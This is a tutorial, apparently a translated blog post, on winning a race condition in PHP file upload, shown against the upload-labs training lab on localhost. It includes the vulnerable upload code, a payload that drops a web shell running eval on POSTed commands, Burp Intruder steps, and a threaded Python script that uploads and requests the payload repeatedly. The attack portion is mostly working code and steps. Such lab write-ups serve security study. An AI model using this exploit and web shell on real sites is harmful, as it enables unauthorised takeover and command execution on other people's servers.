1. What is conditional competition

In some file upload scenarios, the back-end code will first save the files we upload, and then check whether the files we upload contain risks, and if so, they will be deleted. This is what we need and delete functions (such as unlink () function) to compete for time and threads, and strive to access the file before deleting it, so as to achieve the attack effect

2. Scene code analysis

The PHP code used for the experiment in this article is as follows:

<?php
header("Content-Type:text/html;charset=utf-8");
$filename = $_FILES['file']['name'];  //获取上传文件的全名
$ext = substr($filename,strrpos($filename,'.') + 1); //从点号之后的一个字符开始截取，也就是说获取文件后缀

$path = 'uploads/' . $filename;  //上传文件的路径及文件名
$tmp = $_FILES['file']['tmp_name'];   //上传文件在系统中的临时名
if(move_uploaded_file($tmp, $path))  //上传文件到指定路径
{
	if(!preg_match('/php/i', $ext))       //判断后缀是否为php
    {       
		echo 'upload success,file in '.$path;   //不是这返回上传成功
	}
    else
    {
		unlink($path);                    //若是PHP则删除
		die("can't upload php file!");
	}

	}
else
{
    die('upload error');
}

Additional knowledge points:

The contents of the $_FILES global variable array are as follows:
$_FILES['myFile']['name'] The original name of the client file.
$_FILES['myFile']['type'] The MIME type of the file, which needs to be supported by the browser, eg "image/gif".
$_FILES['myFile']['size'] The size of the uploaded file in bytes.
$_FILES['myFile']['tmp_name'] Temporary file name stored on the server after the file is uploaded, generally the system default. It can be specified in upload_tmp_dir of php.ini, but setting with putenv() function will not work.
$_FILES['myFile']['error'] and the error code related to the file upload. ['error'] was added in PHP 4.2.0. The following is its description: (they become constants after PHP3.0)

Code analysis:

The code first moves the uploaded file to the specified directory through the move_uploaded_file function, and then checks whether the suffix of the uploaded file is php through preg_match('/php/ i ', $ext) , which is a case-insensitive rule, and if so Then use the unlink function to delete the file, we need to access the uploaded file before the unlink function is executed

3. Conditional competition steps

1. Competition payload:

Since the time we can open the uploaded file is very short, it is impossible to directly connect to the shell through the uploaded file, but we can make the content of the uploaded file as follows

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])；  ?>' ); ?>

As long as the file is accessed, a shell.php file will be created immediately . Even after the file is deleted by the unlink function , the created shell.php file still exists, and we can take down the site through shell.php

2. Competition method:

Here we take the 17th level of upload-labs as an example

1、burpsuite：

Here we upload the file and grab the package to get

Then send the packet of the uploaded file to the intruder module

Then clear all pre-options

In the payload module , set it to empty payload mode, set the number of times to two thousand, that is to say, upload the file 2000 times continuously , and finally start attack

Finally, keep visiting in the browser

http://localhost/upload-labs/upload/szm.php

The access is successful, that is, the shell access is successful

2, python script:

# coding:utf-8
import requests
from concurrent.futures import ThreadPoolExecutor


def td(list):
    url = 'http://localhost/upload-labs/Pass-17/index.php'
    files = {'upload_file': (
        'szm.php', "<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])；  ?>' ); ?>")}
    data = {'submit': '上传'}
    r = requests.post(url=url, data=data, files=files)
    re = requests.get('http://localhost/upload-labs/upload/szm.php')
    if re.status_code == 200:
        print('上传成功')


if __name__ == '__main__':
    with ThreadPoolExecutor(20) as p:
        p.map(td, range(200))

Conditional competition for PHP file upload (Part 1)